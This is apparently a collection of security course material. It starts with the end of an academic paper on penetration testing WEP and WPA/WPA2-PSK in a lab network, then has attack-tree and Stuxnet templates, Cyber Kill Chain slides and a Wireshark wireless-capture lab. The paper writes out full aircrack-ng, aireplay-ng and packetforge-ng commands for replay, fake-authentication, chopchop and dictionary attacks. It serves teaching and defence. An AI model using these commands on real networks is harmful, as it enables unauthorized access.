PTK which is a dynamic key is used to produce the four-way transmitted unencrypted in the four-way handshake. The PTK
handshake during authentication. The PMK and two Nonces is a temporary key used in order not to broadcast the PMK
are used to create the PTK when connection happens [33]. and relevant information from the four-way handshake. The
weakness in WPA-PSK is as a result of the PMK [14]. The
PTK = Function (PMK, Authenticator Nonce (ANonce), PMK is derived by using the hashing algorithm PBKDF2
Supplicant Nonce (SNonce), Authenticator MAC, Supplicant (Passphrase, SSID, SSIDlen, 4096, 256). The attacker uses the
MAC) PBKDF2 algorithm by inserting the SSID, own generated
Where, passphrase and SSID length to compute a hashed key and
compares it with the captured hashed key. The attacker
PMK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256) succeeds if the two hash values matches, hence, the valid
passphrase is obtained. Information such as Client and AP
PTK = Function ((Passphrase, SSID, ssidLen, 4096, 256),
MAC addresses, ANonce, SNonce and MIC value are
ANonce, SNonce, Authenticator MAC, Supplicant MAC)
transmitted in clear text together with the PMK are used to
Messages exchanged in the four-way handshake are defined generate the PTK. An attacker can use brute force techniques
by using Extensible Authentication Protocol over LAN and dictionary attack to discover or crack the WPA Key [10]
(EAPOL) frames. The EAPOL-Key contain in the four-way [14] [35]. If the password exists in the attacker dictionary or
handshake is used for the purpose of key exchange and wordlist, the WPA key will be successfully cracked.
negotiation [34]. The four-way handshake between the
supplicant and authenticator starts after the generation of the 2.5.3 Attack on WPA/WPA2
PMK. Figure 3 shows an illustration of the generation of four- WPA/WPA2 is vulnerable to attacks against the four-way
way handshake and installation of the PTK handshake and encryption protocol [36]. PTK generation is
based on the PMK, Authenticator MAC, Supplicant MAC and
1. Authenticator to Supplicant Nonces. With the exception of the PMK, the other parameters
Authenticator (AP) generates a long arbitrary value called are transmitted in plaintext throughout the four-way
Authenticator Nonce (ANonce) then encrypt it using the PMK handshake. The only unknown value to the attacker in
(unknown to the supplicant) for the generation of PTK at the computing the PMK is the passphrase (PSK) which can be
supplicant station. guessed correctly by the attacker carrying out a dictionary
attack with a valid four-way handshake captured. The
2. Supplicant to Authenticator
passphrase will be known to the attacker if it exists in the
The supplicant replies the received message to the
dictionary or wordlist [14] [37].
authenticator by generating its own long random value called
Supplicant Nonce (SNonce). The ANonce, SNonce and PMK 3. METHODOLOGY
are used to generate the PTK by the supplicant. MIC is The chosen environment for performing the assessment and
generated using cryptographic hash (HMAC-SHA1) for penetration testing was to set up a WLAN infrastructure as an
integrity check of the key installed on the supplicant side. experimental network laboratory. The study considered to use
28
the network laboratory in order not compromise any

individual or organization network due to privacy and legality
of user information.
3.1 Laboratory Experiment Setup and

Requirements
The experiment required the use of an Authenticator (wireless
router), an external wireless adapter and two laptops (one as
the PenTester PC and other as the supplicant, the supplicant Figure 6: Detection of ARP Request Packets
could be any device with wireless connectivity). Figure 4 The attacker uses the MAC address of the client
illustrate the connections of the used devices. (AC:36:13:6C:6F:4A) in order not to be rejected by the AP to
repeatedly reply the received ARP Request packets and
receive ARP Responses generating more packets with weak
IVs using the command “aireplay-ng --arpreplay -e
SecurityTest -h AC:36:13:6C:6F:4A wlan0mon”.
The attacker successfully generates more packets (70593) as
shown in figure 7.
Figure 4: Setup for Penetration Testing

802.11 WEP Security Protocol Figure 7: Successful Generation of ARP Packets by
Three vulnerabilities were discovered and exploited in the Attacker
IEEE 802.11 WEP security protocol through the penetration
testing conducted. 3.2.2 No Mutual Authentication makes it
Vulnerable to Fake Authentication Attack
3.2.1 No Replay Protection Mechanism in WEP A fake authentication was conducted and the attacker was
The packets were repeatedly replayed into the network to successfully associated with the AP as a result of no mutual
generate more packets with weak IVs. The IVs are weak authentication. The follow indicates the experiment steps:
because the IV space is short and easily get exhausted
resulting in reuse of the IVs. The following steps indicates Attacker uses the command “aireplay-ng --fakeauth 0 -a
how the vulnerability was exploited. 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon” to
conducts a fake authentication using its MAC address
The command, “airodump-ng wlan0mon” was used to (00:C0:CA:83:01:CD) and the AP MAC address
discover the wireless network, sniff and capture data packet. (98:FC:11:EE:41:25) since the AP only authenticates its
The wlan0mon is the monitor mode interface of the wireless clients. Figure 8 shows how authentication request and
card which has a MAC address of 98:FC:11:EE:41:25 association request were successfully acknowledged by the
(targeted AP). Sniffed and captured data packets were saved AP. This means that the attacker got connected to the AP.
to a file called arp-test using the command “airodump-ng --
channel 6 --bssid 98:FC:11:EE:41:25 --write arp-test
wlan0mon” as shown in figure 5.
Figure 5: Capture of Data Packets on Targeted Access

Point
The command “aireplay-ng --arpreplay -e SecurityTest Figure 8: Successful Fake Authentication and Association
wlan0mon” was used to detect ARP Request packets to be with Target AP by Attacker
replayed for the AP to send ARP Response packets to enable
the attacker generate more packets. Figure 6 shows that data 3.2.3 WEP is Vulnerable to Message Modification
packets (59 packets) were received but no ARP Request and Injection Due to ICV Insecurity
packet was detected as a result of the attacker’s MAC address The WEP security protocol could not detect modified packets
(00:C0:CA:83:01:CD). or differentiate between the original and forged packets. The
following steps indicates the existence of the vulnerability:
Attacker uses the command “aireplay-ng --chopchop - a
98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon” to
decrypt the captured encrypted data packets to obtain the
keystream (replay_dec-0713-213506.xor) and plaintext
(replay_dec-0713-213506.cap) as shown in figure 9.
29

802.11 WPA/WPA2-PSK Encryption
Protocol
Three vulnerabilities associated with the security protocol
were discovered as follows:
1. Four-way handshake is transmitted unencrypted
(plaintext).
Figure 9: Capture of Keystream and Plaintext files 2. Message Integrity Check (MIC) is unencrypted
(plaintext).
Attacker modified or forged new packets out of the keystream
and compute the checksum using the command “packetforge- 3. Derivation Formulae for Computing PMK and PTK are
ng -0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD -k known to the Attacker.
255.255.255.255 -l 255.255.255.255 -y replay_dec-0713-
213506.xor -w packetforge-test” and saves the packets to a Attacker requires the capture of a valid four-way handshake
file called packetforget-test. (contains the MIC and inputs to derived the PMK and PTK)
and a wordlist to conduct a dictionary attack to crack the PSK
The command “aireplay-ng -2 -r packetforge-test wlan0mon”, (passphrase) which is unknown to the attacker.
was used to inject the forged packets into the AP or traffic to
generate data packets with new IVs as shown in figure 10. Figure 12 shows a successful capture of the four-way
These generated packets help to speed up the cracking process handshake and saved to file called wpa-handshake using the
of the WEP Key. command “airodump-ng --channel 6 --bssid
98:FC:11:EE:41:25 --write wpa-handshake wlan0mon”.
Figure 12: Successful Capture of WPA Handshake
3.3.1 Cracking of WPA/WPA2-PSK Passphrase

With the captured WPA Handshake and wordlist or dictionary
of passwords, aircrack-ng was used to crack the WPA
Figure 10: Generation of New IVs from Forged Packets
Passphrase using the command “aircrack-ng wpa-handshake-
3.2.4 Cracking of IEEE 802.11 WEP Encryption 01.cap -w passwords”. The passphrase or WPA Key was
successfully cracked as shown in figure 13.
Protocol Key
“Aircrack-ng” tool was run parallel as more packets with
weak IVs were generated. With 51326 IVs, 698 possible keys
were tested and the WEP key was successfully cracked as
shown in figure 11.
Figure 13: WPA- PSK Key (Passphrase) Successfully

Cracked
4. RESULTS ANALYSIS
Vulnerabilities discovered enabled a successful crack of the
wireless security protocols.
Figure 11: WEP Key Successfully Cracked
30
4.1 Analysis on Vulnerabilities in IEEE

802.11 WEP Encryption Protocol
4.1.1 No Replay Protection Mechanism in WEP
Packets (70593) were successfully captured and repeatedly
replayed into the network to generate more packet with weak
IVs which aided in the cracking of the WEP Key. ARP
packets (18112) that were used for the replay attack were Figure 17: Saved Plaintext and Keystream files
successfully captured and injected into network to generate
packets as shown in figure 14. 4.1.4 Cracking of IEEE 802.11 WEP Encryption
Protocol Key
WEP was based on confidentiality, not authorization that uses
RC4 stream cipher and CRC-32 checksum as integrity to
encrypt WEP Key. WEP is vulnerable to attacks due to the
implementation of IV mechanism. The 24-bit IV space gets
exhausted within few hours and these IVs are duplicated. The
Chopchop attack was used to crack the WEP Secret Key. The
Chopchop attack method developed by KoreK, exploits
Figure 14: ARP Packets Generated by Attacker vulnerability in WEP security protocol itself rather than the
4.1.2 No Mutual Authentication makes it weakness in the RC4 algorithm. Without knowing the secret
key, the attacker was able to capture and decrypt encrypted
Vulnerable to Fake Authentication Attack packets to obtain the keystream and plaintext. The keystream
The attacker successfully performed a Fake Authentication and plaintext are XORed to produce a fake cipher text which
and got associated with the AP gaining access to network is injected into the network to generate more packets with
resources. Figure 15 shows an acknowledgement of a weak IVs. The IVs are transmitted in clear text concatenated
successful Authentication and Association by the AP as with the secret shared Key. As weaker IVs are generated it
highlighted. increases the success of cracking the WEP key. With 51326
weak IVs generated, the WEP Key was successfully cracked
as shown in figure 18.
The outcome of the result shows that WEP is vulnerable to
attacks. The WEP key can be cracked without any active
client connected to the network. Also without knowing the
Figure 15: Successful fake Authentication and Association WEP key, the plaintext and the keystream can be obtained
with Target AP by Attacker which is used to crack the key successfully.
The attacker MAC Address (00:C0:CA:83:01:CD) was
indicated in the discovered list of clients that are connected to
the AP with MAC Address (98:FC:11:EE:41:25) as shown in
figure 16.
Figure 16: Attacker Connects to Access Point
4.1.3 WEP is Vulnerable to Message Modification

and Injection Due to ICV Insecurity
Using the “chopchop” attack method, the attacker was able to Figure 18: WEP Key Successfully cracked
decrypt encrypted packets without knowing the secret key.
The attacker chops away the last byte of the captured 4.2 Analysis on Vulnerabilities in IEEE
encrypted packet and substitutes the value of the last byte, 802.11 WPA/WPA2-PSK Encryption
recalculates the encryption checksum and injects the modified
packet into the network, if the AP accepts the modified Protocol
packets means the attacker’s guess was correct else the packet WPA/WPA2-PSK is vulnerable to attacks as a result of the
is rejected by the AP. An invalid packet is as a result of four-way handshake which is transmitted unencrypted
incorrect ICV which means the attacker computes the (plaintext). All the parameters used to conduct the mutual
checksum to validate the forged or modified packets. The authentication (PMK and PTK generation) between the
decrypted packet contains the keystream (replay_dec-0713- supplicant and authenticator (AP) are known to an attacker
213506.xor) file and plaintext (replay_dec-0713-213506.cap) except the passphrase. The formulae derivation of the PMK
file as shown in figure 17. The captured keystream is used for and PTK are as follows:
the generation of forged valid packets to be accepted by the PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
AP.
PTK = Function (PMK, ANonce, SNonce, Authenticator
MAC, Supplicant MAC).
The captured four-way handshake was analyzed with
31
Wireshark. The first message of the EAPOL Handshake was

transmitted from the AP to the Supplicant which comprise of
a random number (256 bits) called ANonce for PTK
generation at the Supplicant. The AP MAC Address and
ANonce were known as highlighted in figure 19.
Figure 21: Successful Crack of WPA/WPA2-PSK

Passphrase
5. CONCLUSION
In assessing the security of IEEE 802.11 WLAN Security
protocols using penetration testing, it is proven that WEP and
WPA/WPA2-PSK are vulnerable to attacks. In WEP, the
entire size of the IV space is 24-bit which gets exhausted
within a short time and cause the IVs to repeat itself as more
Figure 19: First Message of the WPA Four-way packets are being generated. Cracking of WEP Key is
Handshake (ANonce and AP MAC Address) dependent on the generating of more weak IVs. Once enough
weak IVs are generated the key will be successfully cracked.
The Supplicant sends the second message as a reply to the
The CRC32 checksum (ICV) aim is to verify data integrity by
first EAPOL Handshake message by sending its SNonce in preventing alter of data packets in transit. The ICV is related
plain text to the Authenticator encrypted by a cryptographic
to the plaintext not to the cipher text. Fake cipher text
hash algorithm (HMAC-SHA1) called the MIC for integrity
generated does not affect the ICV, therefore, the ICV unable
of the installed key on the supplicant side as highlighted in
to achieve its aim. In the case of WPA/WPA2-PSK, the four-
figure 20. An MIC is computed for each PTK by the AP and
way handshake between the client and the AP is easy to be
compared with the captured MIC in the second message of the
captured by an attacker and determine the PMK and PTK
EAPOL Handshake. If they are equal, the attacker derives
since it is dependent on the captured of the four-way
same PTK and the passphrase is cracked.
handshake. WPA/WPA2-PSK will be successfully cracked if
only the passphrase exists in the attacker’s wordlist or
dictionary file since the PMK and PTK can be determined.
6. REFERENCES
[1] Lee P., Stewart D. and Calugar-Pop C., (2014).
Technology, Media & Telecommunications Predictions.
London: Deloitte report, pp. 1-60, 2014.
[2] Waliullah Md., Moniruzzaman A. B. M., and Sadekur
Rahman Md., (2015). An Experimental Study Analysis
of Security Attacks at IEEE 802.11 Wireless Local Area
Network. International Journal of Future Generation
Communication and Networking, vol. 10, no. 4, pp. 9-18.
[3] Ola G., (2013). Penetration Testing on a Wireless
Network Using Backtrack 5. Turku University of
Applied Sciences.
[4] Chen Z., Guo S., Zheng K., and Li H., (2009). Research
on man-in-the-middle denial of service attack in sip
Figure 20: Second Message of the WPA Four-way VoIP," Networks Security, Wireless Communications
Handshake (SNonce, MIC and Client MAC Address) and Trusted Computing, NSWCTC, vol. 2, pp. 263-266,
The Passphrase of the WPA/WPA2-PSK was successfully Apr. 2009.
obtained as shown in figure 21 indicating the PMK, PTK and [5] Appiah, J. K., (2014). Network and Systems Security
the MIC using cryptographic hash algorithm (HMAC-SHA1). Assessment using penetration testing in a university
The outcome of this study implies that WPA/WPA2-PSK is environment: The case of Central University College.
vulnerable to dictionary attack. Attacker can crack Kwame Nkrumah University of Science and Technology,
WPA/WPA2-PSK if the passphrase exists in dictionary or Kumasi.
wordlist. [6] National Institute of Standards and Technology (NIST),
(2008). Technical Guide to Information Security Testing
and Assessment, Special Publication 800-115,
Gaithersburg.
32
[7] Praveen L., Ravi S. Y., and Keshava R. M. (2011). Bio-Inspired Network. Liverpool John Moores
Securing IEEE 802.11g WLAN Using OPENVPN and University.
Its Impact Analysis. International Journal of Network
Security & Its Applications (IJNSA), Vol.3, No.6, [23] Kurup L., Shah V. and Shah D., (2014). Comparative
November 2011. Study of Attacks on Security Protocols. International
Journal of Advanced Research in Computer Engineering
[8] Kropeit T. (2015), Don’t Trust Open Hotspots: Wi-Fi & Technology (IJARCET) Volume 3 Issue 8, August
Hacker Detection and Privacy Protection via 2014
Smartphone. Ruhr-Universitat Bochum.
[24] Fluhrer S., Mantin I. and Shamir A., (2001). Weaknesses
[9] Forouzan B., (2008). Data Communications & in the Key Scheduling Algorithm of RC4. Eighth Annual
Networking. 4th edition. New York: McGraw-Hil Workshop on Selected Areas in Cryptography, August
2001.
[10] L’ubomir Z., (2012). Security of Wi-Fi Networks.
Comenius University, Bratislava [25] Hulin K., Locke C., Mealey P., and Pham A., (2010).
“Analysis of wireless security vulnerabilities, attacks,
[11] Bilger J., Cosand H., Singh N. and Xavier J. (2005). and methods of protection”. Information Security
Security and Legal Implications of Wireless Networks, Semester Project, 2010.
Protocols, and Devices
[26] [Robyns P., (2014). Wireless Network Privacy. Hasselt
[12] Shweta T., Pratim K., Sumedh K, and Aniket G., (2013). University
“Study of Vulnerabilities of Wlan Security Protocols,”
Journal, Dep. Comput. Eng. Fr. C. Rodrigues Inst. [27] Zarch S. H. M., Jalilzadeh F., and Yazdanivaghef M.,
Technol. Vashi, Navi Mumbai, no. September, pp. 109– (2012). Encryption as an Impressive Instrumentation in
112, 2013 Decrease Wireless WAN Vulnerabilities. International
Journal of Scientific and Research Publications, Volume
[13] Memon A. Q., Raza A. H. and Iqbal S., (2010). WLAN 2, Issue 12, December 2012, ISSN 2250-3153
Security. Halmstad University School of Information
Science, Computer and Electrical Engineering. Technical [28] Papaleo, G. (2006). Wireless Network Intrusion
report, IDE1013, April 2010. Detection System: Implementation and Architectural
Issues: Universita degli Studi di Genova.
[14] Kumkar V., Tiwari A., Tiwari P., Gupta A. and Shrawne
S., (2012). Vulnerabilities of Wireless Security protocols [29] Ciampa M. D., (2012). Security+ Guide to Network
(WEP and WPA2). International Journal of Advanced Security Fundamentals. Course Technology, Cengage
Research in Computer Engineering & Technology. Learning.
Volume 1, Issue 2, April 2012
[30] Laverty D., (n.d.). WPA versus 802.11i (WPA2): How
[15] Park T., Wang H., Cho M., Shin K. G., (2002). Enhanced your Choice Affects your Wireless Network Security.
Wired Equivalent Privacy for IEEE 802.11 Wireless http://www.openxtra.co.uk/articles/wpa-vs-80211i.php
LANs: The University of Michigan
[31] Mkubulo D., (2007). Analysis of Wi-Fi Security
[16] Intercop Net Labs, (2002). "What's Wrong with WEP?" Protocols and Authentication Delay. The Florida State
Retrieved from University, FAMU-FSU College of Engineering
http://www.opus1.com/www/whitepapers/whatswrongwi
thwep.pdf (Accessed on May 10, 2018) [32] Vanhoef M., and Piessens F., (2017). Key Reinstallation
Attacks: Forcing Nonce Reuse in WPA2. imec-DistriNet,
[17] Borisov N., Goldberg I., and Wagner D., (2001). KU Leuven
Security of the WEP algorithm Retrieved from
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html [33] Ramachandran, V. (2011), BackTrack 5 Wireless
(Accessed on April 24, 2018) Penetration Testing, Master Bleeding Edge Wireless
Testing Techniques with BackTrack 5: Packt Publishing,
[18] Kiemele L., (2011). Wireless Network Security. Birmingham UK
V00154530
[34] Noh J., Kim J., and Cho S., (2018). Secure
[19] Zahur Y. and Yang T., (2004). “Wireless LAN Security Authentication and Four-Way Handshake Scheme for
and Laboratory Designs”. University of Houston Clear Protected Individual Communication in Public Wi-Fi
Lake CCSC, Journal of Computing Sciences in Colleges, Networks. Digital Object Identifier 10.1109/IEEE
vol. 19, no. 3, January 2004, pp. 44-60. ACCESS.2018.2809614
[20] Bulbul H. I., Batmaz I. and Ozel M., (2008). Wireless [35] Kaplanis C., (2015). Detection and prevention of Man in
Network Security: Comparison of WEP (Wired the Middle attacks in Wi-Fi Technology
Equivalent Privacy) Mechanism, WPA (Wi-Fi Protected
Access) and RSN (Robust Security Network) Security [36] Stimpson T., Liu L., Zhang J., Hill R., Liu W. and Zhan
Protocols. Gazi University Y. (2012). “Assessment of Security and Vulnerability of
Home Wireless Networks”, IEEE 9th International
[21] Gupta S., (2012). Wireless Network Security Protocols- Conference on Fuzzy Systems and Knowledge
A Comparative Study, IJETAE, 2012 Discovery, Chongqing, China, 29-31 May, 2012, pp.
2133-2137.
[22] Alselwi A., (2015). Wireless Security Protocol in DNA
IJCATM : www.ijcaonline.org 33
View publication stats

Structuring your Attack tree example
Start with the action, the move across to the steps, each step may have a sub step, then
mitigation (please highlight these)
Block access RFID (Action by attacker)

Shield Tag
Faraday cage
Around Reader
Around Tag
Vicinity of tag
Block Reader
Block Tag
Jam Signal
CSS Seminar template.
Objectives
Vulnerable name: STUXNET
Year first discovered:
How many devices infected / affected (what’s the scale of the vulnerability):
Who claimed responsible / been accused for the attack:
What/ who was its target:
How did it infect / spread:
What’s is the nature of the vulnerability (what did it exploit):
Provide examples of organisations / governments which have been affected by the vulnerability:
Overview of the vulnerability (use the examples above to provide a narrative of the vulnerability):
Iterations / mutations (include year mutant identified):
Is their capacity for the vulnerability to be exploited again, perhaps in a different setting. Explain:
Any other discerning characteristics of this vulnerability:

The Cyber Kill Chain model
UFCF7P-15-M - Critical Systems Security

Session Learning
Outcomes
1. Understanding APTs phases
2. Understanding the Cyber Kill Chain
model
2
• Advanced Persistent Threats (APTs) are sophisticated and targeted
cyberattacks carried out by highly skilled adversaries with specific
objectives.
Advances
• Advanced: They are targeted. They may employ more than one
Persistent attack methods and multiple spreading mechanisms to increase the
probability of a successful attack on the target.
Threats • Persistent: They operate in stealth mode for a prolonged period of
(APTs) time ranging from months to years until they reach the final target.
Often, they hide their actions from monitoring software.
3
Advances Persistent Threats
(APTs): Examples
• SolarWinds: The SolarWinds cyberattack was a significant supply chain attack attributed
to APT29 (Cozy Bear), a Russian-state-sponsored APT group. The attackers compromised
the SolarWinds Orion software platform, used by thousands of organizations for IT
infrastructure management. This enabled the threat actors to infiltrate the networks of
multiple high-profile targets, including U.S. government agencies and Fortune 500
companies.
• Hafnium: Microsoft discovered a Chinese-state-sponsored APT group called Hafnium,
which targeted Microsoft Exchange Server vulnerabilities to gain access to email accounts
and exfiltrate sensitive data. Hafnium is known to target organizations in various sectors,
including defense, healthcare, and higher education.
• UNC2452 / Nobelium: An APT group also involved in the SolarWinds attack, continued its
cyber-espionage campaign targeting various organizations. In May 2021, Microsoft
disclosed that Nobelium had launched a new wave of attacks using the USAID email
system to distribute malicious phishing emails.
• APT41: A Chinese-state-sponsored APT group which targeted various industries
worldwide, including healthcare, telecommunications, and higher education. In 2020, the
U.S. Department of Justice (DOJ) charged five Chinese nationals for their involvement in
APT41 activities, including unauthorized access to protected computers and stealing
sensitive information.
https://www.hackerone.com/knowledge-center/advanced-persistent-threats-attack-stages-examples-and-mitigation 4
Advances Persistent Threats (APTs): Steps
1. Reconnaissance: APT attackers begin by gathering information about the target organization, its employees, infrastructure, and security defences.
This may involve scanning publicly available information, social engineering tactics, and probing for vulnerabilities in the target's network.
2. Initial Compromise: Once attackers have identified potential vulnerabilities or entry points, they initiate the attack by exploiting weaknesses in the
target's systems or networks. This may involve exploiting software vulnerabilities, phishing emails, or other tactics to gain an initial foothold in the
target environment.
3. Establishment of Persistence: After gaining initial access, APT attackers take steps to establish persistence in the target environment. This involves
installing backdoors, remote access tools, or other malware to maintain access to the compromised systems even after security measures are
implemented.
4. Lateral Movement: With persistent access to the target network, APT attackers move laterally across the network to explore and compromise
additional systems and resources. This may involve exploiting weak credentials, escalating privileges, or exploiting misconfigured systems to gain
access to critical assets and data.
5. Data Exfiltration: Once APT attackers have compromised the target's systems and achieved their objectives, they begin to exfiltrate sensitive data
from the target environment. This may involve stealing intellectual property, customer data, financial information, or other valuable assets.
6. Covering Tracks: To avoid detection and maintain access to the compromised systems, APT attackers cover their tracks by deleting logs, modifying
timestamps, and obfuscating their activities. This makes it difficult for defenders to detect and respond to the attack.
7. Continued Monitoring and Persistence: Even after exfiltrating data or achieving their objectives, APT attackers may continue to monitor the target
environment for future opportunities or maintain access for future attacks. This allows them to maintain a persistent presence in the target
environment and carry out additional malicious activities over time.
5
Cyber Kill Chain model
• The Cyber Kill Chain model is a concept

that describes the stages of a
cyberattack, from initial reconnaissance
to data exfiltration.
• The model provides a framework for
understanding and analysing cyber
threats, allowing organisations to better
defend against and mitigate
cyberattacks.
6
Cyber Kill Chain model steps
• Reconnaissance: Research, identification and collection of data about the target organization, encompassing its infrastructure,
staff, and security protocols. This process may entail scanning for vulnerabilities, gathering publicly accessible data, and
executing social engineering tactics.
• Weaponization: Once attackers have gathered information about the target, they develop or acquire tools and techniques to
exploit vulnerabilities in the target's systems. This may involve creating malware, crafting phishing emails, or exploiting known
software vulnerabilities.
• Delivery: Attackers deliver the weaponized payload to the target's systems. This can occur through various methods, such as
email attachments, malicious websites, or compromised network connections.
• Exploitation: In this stage, attackers exploit vulnerabilities in the target's systems to gain unauthorized access. This may
involve exploiting software vulnerabilities, misconfigurations, or weak authentication mechanisms to gain a foothold in the
target's network.
• Installation: Once attackers have gained access to the target's systems, they install backdoors, remote access tools, or other
malware to maintain persistence and establish control over the compromised systems.
• Command and Control (C2): Attackers establish communication channels with the compromised systems to remotely control
them and exfiltrate data. This may involve using command-and-control servers, remote administration tools, or covert
communication channels.
• Actions on Objectives: In this final stage, attackers achieve their objectives, which may include stealing sensitive data,
disrupting operations, or causing financial damage. This may involve exfiltrating data, modifying or deleting files, or launching
further attacks against other systems.
7
Cyber Kill
Chain model
steps/actions
8
• Can you identify:
• Examples of reconnaissance in ICS
environments?
• Weaponiser examples in ICS?
• The prevalent transmission mechanisms
Task 1 in ICS?
• Examples of attack against the user
and/or attack against the system?
• Examples of the Installation phase in ICS?
• What is the difference in ICS for the 2 last
phases?
9
• 1. Study the Stuxnet scenario in the following
slides.
Task 2 – What • 2. What were the vulnerable points in the attack

scenario?
to do? • 3. Select another case study of your choice.
Propose and discuss a scenario following the
provided example.
STUXNET Attack scenario
• Primarily written to target an industrial control system or set of

similar systems.
• Its final goal is to reprogram ICSs by modifying code on PLCs to

make them work in a manner the attacker intended and to hide
those changes from the operator of the equipment [6].
11
Stuxnet Attack scenario
• First, the attackers needed to conduct reconnaissance.

• As each PLC is configured in a unique manner, the attackers would first need
the ICS’s schematics. These design documents may have been stolen by an
insider or even retrieved by other malware (early version of Stuxnet or other
malicious binary).
• The attackers would have needed to obtain the digital certificates from
someone who may have physically entered the premises of the two
companies and stole them.
• The final version of Stuxnet couldn’t have been developed without this
knowledge [6].
12
Attackers would need to setup a

mirrored environment that would
include the necessary ICS hardware,
such as PLCs, modules, and peripherals Weaponisation phase in the cyber kill
in order to test their code. The full cycle chain model (we’ll talk about this in
may have taken six months and five to future lectures).
ten core developers not counting
numerous other individuals, such as
quality assurance and management [6].
• To infect their target, Stuxnet would need to be introduced into the target
environment. This may have occurred by infecting a willing or unknowing
third party, such as a contractor who perhaps had access to the facility, or an
insider. The original infection may have been introduced by removable drive.
• Once Stuxnet had infected a computer within the organization it began to

spread in search of Field PGs, which are typical Windows computers but
used to program PLCs.
• Since most of these computers (Field PGs) are non-networked, Stuxnet

would first try to spread to other computers on the LAN through a zero-day
vulnerability, a two year old vulnerability, infecting Step 7 projects, and
through removable drives. Propagation through a LAN likely served as the
first step and propagation through removable drives as a means to cover the
last and final hop to a Field PG that is never connected to an untrusted
network.
• When Stuxnet finally found a suitable computer (Field PG), one that ran Step
7, it would then modify the code on the PLC. These modifications likely
sabotaged the system.
• Victims attempting to verify the issue would not see any rogue PLC code as
Stuxnet hides its modifications.
17
Week 10 Critical Systems Security
Analysis of a Wireless Capture

LAB
Week 10
Objectives
 Use Wireshark and tshark to analyse wireless traffic for evidence of malicious activity
 Leverage knowledge of the relative strength or weakness of different wireless network configurations
to focus analysis on the points of an attacker may be more likely to target.
 Use penetration testing tools to access encrypted content protected by weaker mechanisms.
The Case: Analysis of a Wireless Capture

A Client informs you that before returning to University, a summer cyber security student commented that
the wireless network configuration was a joke. She saw numerous flaws in its configuration. In particular,
she said that the DNS-based block for typical "time-wasting" sites such as Facebook was utterly ineffective.
Unfortunately, before the administration team could get more details, the Cybersecurity student left.
The client never had much of a dedicated wireless skill set in-house since the Wi-Fi deployment was
entirely driven by the CEO's desire to have Apple iPads throughout the office to look "cool" for visitors.
Although well-intentioned, the client's IT and security teams could not adequately address the security
concerns associated with wireless networks, leaving what they admit is likely a massive hole in the
corporate security footprint.
However, the news of the ineffective Facebook block has "lit a fire" under the CEO who now considers the
wireless network the culprit for lost productivity around the office.
He has directed the IT and security departments to capture 15-20 minutes of network traffic so they can
"find and fix" the problem. The client hands you the pcap file and asks for your help in finding credible
answers to the boss's incredible questions.
To Prepare:
1. Log into UWECyber VM or Kali Linux VM
2. Create a working directory "CSS" on your desktop
3. Download the file "wireless.zip" from Blackboard, unzip it and copy it in the directory created
"CSS"
4. Open the file "wireless.pcap" in Wireshark
Week 10
1. Validate the client's WLAN SSIDs

Open the wireless.pcap file in Wireshark. In the "Name Resolution" section of Wireshark's
"View → Name Resolution" menu, ensure that "untick Enable for MAC Layer" is disabled. This will cause
Wireshark to display each MAC address as the raw six hex bytes, providing a cleaner view of the data.
Using Wireshark's "Statistics → WLAN Traffic" menu option to verify the list of SSIDs and BSSIDs contained
within the capture file. In the "WLAN Traffic Statistics" dialog box, ensure the "Only show existing
networks" option is checked. This option hides unknown networks from the statistical view.
The client has informed you that each of their four wireless network SSIDs contains the word "Target" in its
name, and that each name indicates the purpose of the respective wireless network. Additionally, the
client confirms that each SSID is served by one and only one access point.
a) Complete the table below with the listed data fields for the client's wireless networks. (Note that you
may need to resize data columns, or scroll to the right to get all data points)
BSSID SSID Security Type (WEP/WPA/WPA2 802.11 Channel
The algorithms that Wireshark uses to identify the security/protection type for a given WLAN are
somewhat limited in that they prefer absolute positive identification to make erroneous assumptions.
Therefore, some configurations may reflect a "blank" value in the "Protection" column of the WLAN Traffic
Statistics dialog, even though the WLAN uses encryption. In these cases, manual verification is necessary.
For each of the client's BSSIDs without a listed Protection type, right-click the statistic row, then choose the
"Apply as Filter → Selected → BSSID" menu options. This will return you to the main Wireshark interface
with a display filter applied that matches only traffic to or from the selected network.
Find a "Beacon" frame, which contains a catalog of the capabilities the access point supports.
Week 10
b) In the Packet Details pane, browse through the "Tagged Parameters" section of the Wireless LAN
Management Frame to see what you can learn or infer about the protection mechanisms used for each
BSSID. Pay attention to fields that contain information about Cipher Suites, Key Management, and
other standard WLAN security terms. Add your findings to the table you already stated above.
Remember that an access point can provide multiple security standards simultaneously, so review all
fields to ensure you completely characterise the capabilities of each SSID. Recall also that the "RSN"
security type is another name for "WPA2"
BSSID SSID Security Type (WEP/WPA/WPA2) 802.11 Channel
c) Recall that each access point's BSSID follows the same structure as a MAC address on the wired
network interface controller: three manufacturer-identifying bytes (called the OUI) followed by three
device-specific bytes. While not always the case, devices containing multiple hardware interfaces are
often assigned sequential hardware addresses. Return to the WLAN Traffic Statistics window and order
the results by BSSID by clicking the "BSSID" column header. What do you see in the cluster of the
client's known access points? What theories can you think of for this situation? Why do you think this is
the case? How did Wireshark get around this situation?
Week 10
d) Apply a display filter to match the BSSID for the access point that provides this newly discovered
WLAN. (Right-Click the entry in the "WLAN Traffic Statistics" dialog, then select "Apply as Filter →
Selected → BSSID"). Examine each beacon frame. What do you notice is absent from the frame when
compared to those from the previous wireless networks? Why do you think this is the case? How did
Wireshark get around this situation?
Week 10
2. Review the security of the various SSIDs and characterise communications

While this is a response-based investigation, it is still important to understand the weaknesses associated
with various WLAN security modes. In this case, the client has a policy regarding such configurations, but it
would also help to establish what routes an attacker might have used to conduct malicious activity. Most
attackers will take the path of least resistance while conducting their activities, meaning the "easy targets"
are often good investigative leads to follow.
a) Given the SSIDs identified above, rank them in order of least to most secure.
ORDER SSID SECURITY TYPE (WEP/WPA/WPA2) NOTES

and KEY MGMT METHOD
b) Given the non-compliant access point status with the weakest security configuration, characterise
the activity that occurred using its SSID. First, list the hardware addresses that used this SSID. Then, use
tshark with a display filter to limit traffic to the SSID in question and display the source address (wlan.sa)
and destination address (wlan.da) for each matching frame.
List the conversations you identify, and annotate the known and unknown hardware addresses.
tshark -n -t wireless.pcap -Y 'wlan_mgt.ssid=="Covert_WLAN" '

